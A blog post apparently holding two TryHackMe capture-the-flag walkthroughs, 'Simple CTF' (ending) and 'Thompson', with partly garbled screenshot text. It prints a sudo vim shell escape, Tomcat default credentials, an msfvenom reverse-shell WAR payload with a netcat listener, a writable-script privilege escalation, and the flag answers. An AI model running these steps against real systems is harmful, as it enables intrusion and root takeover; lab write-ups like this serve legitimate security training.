Now its time to check the GTFO Bins https://gtfobins.github.io/

GTFO Bins provides the curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. This is one of the easiest way find different binaries, which can be used to escalate the privileges.

gtfobins.github.io/gtfobins/vim/#sudo I Sudo It runs in privileged context and may be used to access the file system; escalate or maintain access with elevated privileges If enabled on sudo _ suda vim -c ' : 2/ bin/sh

We’ve used the same command as mentioned in the GTFO bins to spawn the shell, and we’ve got root access.

$ sudo vim # whoami root

We’ve got answer for the 9th question in TryHackMe

First we’ve used the command “pwd” to understand the present working directory, then we switched to root folder using the command “cd”. IN the root folder we’ve found a root.txt file. Again we’ve used the cat command to view the content of the root.txt

# pwd /home/mitch cd /roo # Is root. txt # cat roo W311 døn3. You made

Here we go!, we’ve got the root flag also we’ve got the answer for the TryHackMe 10th question

Conclusion

I believe, you enjoyed the cracking procedure of Simple CTF box and learned something new today . I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box MrSeth6797. Thanks .

Thomson – TryHackMe

Today, I am going to take you through a simple CTF challenge related to Tomcat.

What is Tomcat?

Apache Tomcat is an open source implementation of the Java Servlet and Java Server Pages technologies. Tomcat is being  used to power a wide range of applications and websites across the Internet.

What is TryHackMe ?

TryHackMe is an online platform for learning and teaching cyber security, all through your browser. For more info visit tryhackme.

Let’s Capture the Flag

Step-1

First and foremost, check the connectivity between your machine and THM machine. If pinging is working, next step is start the Nmap scanner .

nmap -A <IP address>

from the Nmap scan we understood, there were three services running. SSH service is running in port 22 and Apache Tomcat is running in port 8080 and 8009 is related Tomcat.

Step-2

Since we understood port 8080 is open and Apache Tomcat is running, lets search in web browser.

We got a Apache Tomcat web page, if you click the Server status, it will prompt us to enter the username and password. since we don,’t know the username and password, we have to click cancel, then the below shown page will appear. In that we can see the username “tomcat’ and password “s3cret“.

TryHackMe I Thompson X Kali Linux Kali Training 01 Unauthorized 401 Unauthorized NetHunter n Offensive Security •i Exploit-DB Kali Tools •b Kali Docs Kali Forums You are not authorized to view this page. If you have notchanged any configuration files, please examine the file Conf [tomcat -users. xmV in your installation. For example, to add the manager role to a user namecE2with a password the following to the config file listed above. krole guser password="s3cret" roles="manager-gui"/>

Step-3

We’ve got the default username and password of the manager. Let’s try the same username and password in the log in page. With default credentials we’ve got access to the Server configuration pages. Ideally this is a misconfiguration , where administrator failed to change the default username and password.

Also we found an option to upload a “WAR file”.In software engineering, a WAR file (Web Application Resource ) is a file used to distribute a collection of JAR-files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web.

If we could manage to upload the WAR file, then we can develop our own exploit using msfvenom in .war format, When we run the .WAR file,we will get a reverse shell.

TryHackMe I Thompson X Kali Linux Kali Training Imanager G) 10.10.12.115 :8080/manager/html/list Kali Tools •b Kali Docs Kali Forums Context Path (required): XML Configuration file URL: WAR or Directory URL: Deploy Select WAR file to upload NetHunter Browse... Deploy Offensive Security No file selected. Exploit- WAR file to deploy

Step-4

Using msfvenom, we developed the exploit. To get reverse shell, we have assigned the LHOST and LPORT with our machine’s ip address and port number.

rootakali : /home/kali# msfvenom -p java/jsp_shell_reverse_tcp LHOST=IO .8.81.64 Payload size: 1099 bytes Final size of war file: 1099 bytes rootakali : /home/kali# LPORT=4444 -f war > shell .war

Once the file is generated, upload the “shell.war” file. Besides, start netcat to listen on port 4444. So that when we run/click the shell (step-3), reverse shell connection will be established.

Start Stop shel ploy None specified true O No file selected. Expire sessions Reload with idle Undeploy 30 minut Deploy directory or WAR file located on server Context Path (required): XML Configuration file URL: WAR or Directory URL: Deploy WAR file to deploy Select WAR file to upload Browse... Deploy

Step-5

After file uploading , when we clicked the shell(3), we got reverse shell.

nc -Ivp 4444 listening o 10.10.186.167: inverse host lookup failed: Unknown host connect to [10.8.81.64] from (UNKNOWN) [10.10.186.167] 35720

since we got the reverse shell, we switched to the directory “home”. using ls, we came to know there is a user called “jack“. Again using the ls command we listed all the contents inside the directory. There we’ve found the text file called “user.txt”

cd home Is ack cd ome cd home /bin/sh: 11: $ cd jack cds jack cd: $ Is Is id.sh test. txt can't cd to home user . txt

To see the content of the user.txt file, we have used “cat” command.

$ cat user.txt rat t Y t

Also we’ve answered the TryHackMe first question

user . txt 39400c90bc683a41a8935e4719f181bf Correct Answer

Step-6

To answer the second question, we need to escalate our privileges to root, then only we will be able to access to root folders with root user privileges.

Let us try to find out what are the files in the current working directory,to do that we’ve executed the command “ls-al“. This command will list down all the files including the hidden files. We’ve found file id.sh, in which jack is having the read/write/execute permission.

-al Is -al total 48 drwxr -xr-x drwxr -xr-x -rw-r—r -rw-r—r drwx -rwxrwxrwx drwxrwxr-x -rw-r—r— -rw-r—r -rw-r—r -rw-rw-r -rw-r—r— jack 4 root 1 root 1 jack 1 jack jack hack jack 1 jack 1 jack 1 root 1 jack 1 root jack root root jack jack jack hack jack jack jack root jack root 4096 4096 1476 220 3771 4096 26 4096 655 39 33 183 Aug Aug Aug Aug Aug Aue Aug Aug Aug Aug Jul Aug Aug 23 14 14 14 14 14 14 14 14 14 29 14 14 2019 . 2019 . . bash _ history 2019 . bash_logout 2019 . bashrc 2019 . cache 2019 id.sh 2019 2019 .nano .profile 2019 .sudo as admin successful 2019 05 : 56 test. txt 2019 user . txt .wget-hsts 2019

Usually the flag will be located in the root directory and also from the TryHackMe we understood the file which is containing the flag is root.txt. This is little tricky, However Let’s try with echo command to copy the root.txt to the present working directory ie jack.

tomcataubuntu:/home/jack$ echo "cp /root/root. txt /home/jack/root.txt" echo "cp /root/root.txt /home/jack/root.txt" >id.sh tomcataubuntu: /home/jack$ cat id.sh /root/root.txt /home/jack/root.txt >id.sh

Echo command successfully executed, the root.txt file is copied to the present working directory. To check the content, we’ve used “ls” command and we found root.txt . Again to see the content of root.txt we’ve used “cat” command.

Here we go, we’ve got the root user flag.

tomca taubuntu home/ jack$ Is id.sh root. txt test. txt tomcataubuntu : /home/ jack$ cat root. txt Is user. txt Cat root.txt

We’ve also got the answer for the 2nd question in TryHackMe.

root . txt d89d5391984c0450a95497153ae7G3a Correct Answer

Conclusion

We’ve successfully completed the Thomson boot2root machine for FIT and bsides guatemala CTF challenge . I would like to thank TryHackMe and Stuxnet who created the amazing CTF challenge. Keep it up! Once again, hope you enjoyed the walk through. See you soon!

Design a site like this with WordPress.com
Get started